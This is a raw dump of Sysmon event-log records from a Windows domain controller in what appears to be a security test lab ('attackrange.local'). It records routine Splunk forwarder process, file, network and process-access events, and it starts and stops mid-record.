Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:08.023{266CAFBE-64FC-6064-0F01-00000000AE01}6200C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.783{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.644{266CAFBE-64FD-6064-1101-00000000AE01}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000008706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.456{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73C9F614B5EAD90525848D93006EA60,SHA256=D1EBE1ECA826FA2728B461C9B9DC328596F3EE2C16679C5D78606E50E926A765,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.207{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB658915D1FEFE57BFC8B65F230A6206,SHA256=4487C0C022CF541C473FB4D338D970153C023D9C799BF38AD26F2584484FAAB3,IMPHASH=00000000000000000000000000000000falsetrue 734700x80000000000000008704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.191{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x80000000000000008703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000008701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=DA5FD7A16CFAE74BB2B8D42D5B636FE4,SHA256=A772FD14E1AE664BB225CCC180F3378FFBA0B873A281F26C347860D4F17C0CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.175{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=028B3DA03588EBE3A545DC30C548B7C4,SHA256=B17614CF59B539AF554937B23A03A9556F0C8D57EA579C57DC6CF37F0CC3BCFA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.160{266CAFBE-64FC-6064-1001-00000000AE01}66606664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000008698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:03:09.113{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72625-0xd0e6900d) 10341000x80000000000000008731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-64C1-6064-9100-00000000AE01}51083828C:\Windows\system32\csrss.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008726Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008725Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.859{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.868{266CAFBE-64FE-6064-1201-00000000AE01}3352C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 354300x80000000000000008723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.433{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59380- 354300x80000000000000008722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.401{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53606-false10.0.1.12-8000- 354300x80000000000000008721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.367{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53605-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000008720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.367{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53605-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000008719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.362{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53604-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000008718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:09.362{266CAFBE-64FC-6064-1001-00000000AE01}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local53604-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 23542300x80000000000000008717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.267{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D74ECFC890D4C27962B4FDCDFDF5EDF0,SHA256=382129CBBCCB64BBF87FBEB7143083BC1049D1243563E6E6E31445EDA57989BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD05B61FA6FF5DFD2CA54221E386393B,SHA256=99EE4203273FBB2544C8D4293220CC6F4652FE84D538FC84B1B041B0AAEDBB70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000008715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:03:10.033{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F084D69A363885334B922E70A4B3CE3,SHA256=02E4FAA1C800F3D69D3F49B16290D9B689B60AF4DDEAC9398AB52542E7CBC010,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000008739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 